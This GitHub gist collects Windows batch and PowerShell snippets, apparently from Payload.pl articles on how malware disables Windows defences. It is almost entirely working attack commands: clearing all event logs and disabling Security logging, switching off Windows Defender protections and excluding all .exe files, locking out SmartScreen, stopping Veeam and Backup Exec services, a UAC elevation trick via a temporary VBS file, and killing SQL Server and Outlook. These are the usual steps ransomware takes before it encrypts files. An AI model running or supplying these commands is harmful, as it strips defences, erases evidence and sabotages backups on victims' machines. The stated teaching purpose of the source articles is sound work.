Skip to content

Instantly share code, notes, and snippets.

@tomaszklim
Last active June 18, 2021 17:23
Show Gist options
  • Save tomaszklim/2ec69a4406700d8aa688b66bfbc94ebe to your computer and use it in GitHub Desktop.
Save tomaszklim/2ec69a4406700d8aa688b66bfbc94ebe to your computer and use it in GitHub Desktop.
Source code for articles on Payload.pl
REM Code from https://payload.pl/jak-prosto-wirusy-rozbrajaja-zabezpieczenia-windows-10/
for /f “delims=” %%I in (‘wevtutil el’) do (wevtutil cl “%%I”)
wevtutil sl Security /e:false
REM Code from https://payload.pl/windows-defender/
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
powershell.exe -command "Set-MpPreference -PUAProtection disable"
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
REM Code from https://payload.pl/smartscreen/
takeown /f "%systemroot%\System32\smartscreen.exe" /a
icacls "%systemroot%\System32\smartscreen.exe" /reset
taskkill /im smartscreen.exe /f
icacls "%systemroot%\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
REM Code from https://payload.pl/jak-popsuc-backup-windows/
net stop VeeamBackupSvc
net stop VeeamBrokerSvc
net stop VeeamCatalogSvc
net stop VeeamCloudSvc
net stop VeeamDeploymentService
net stop VeeamDeploySvc
net stop VeeamEnterpriseManagerSvc
net stop VeeamHvIntegrationSvc
net stop VeeamMountSvc
net stop VeeamNFSSvc
net stop VeeamRESTSvc
net stop VeeamTransportSvc
REM Code from https://payload.pl/jak-popsuc-backup-windows/
net stop BackupExecAgentAccelerator
net stop BackupExecAgentBrowser
net stop BackupExecDeviceMediaService
net stop BackupExecJobEngine
net stop BackupExecManagementService
net stop BackupExecRPCService
net stop BackupExecVSSProvider
REM Code from https://payload.pl/wirusy-i-uac/
>nul 2>&1 "%systemroot%\System32\cacls.exe" "%systemroot%\System32\config\system"
REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
echo Requesting administrative privileges...
goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
set params = %*:"="
echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"
"%temp%\getadmin.vbs"
del "%temp%\getadmin.vbs"
exit /B
:gotAdmin
pushd "%CD%"
CD /D "%~dp0"
echo "Now have elevated permissions."
whoami
pause
REM Code from https://payload.pl/jak-prosto-wirusy-rozbrajaja-zabezpieczenia-windows-10/
taskkill /im sqlservr.exe /f
taskkill /im outlook.exe /f
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment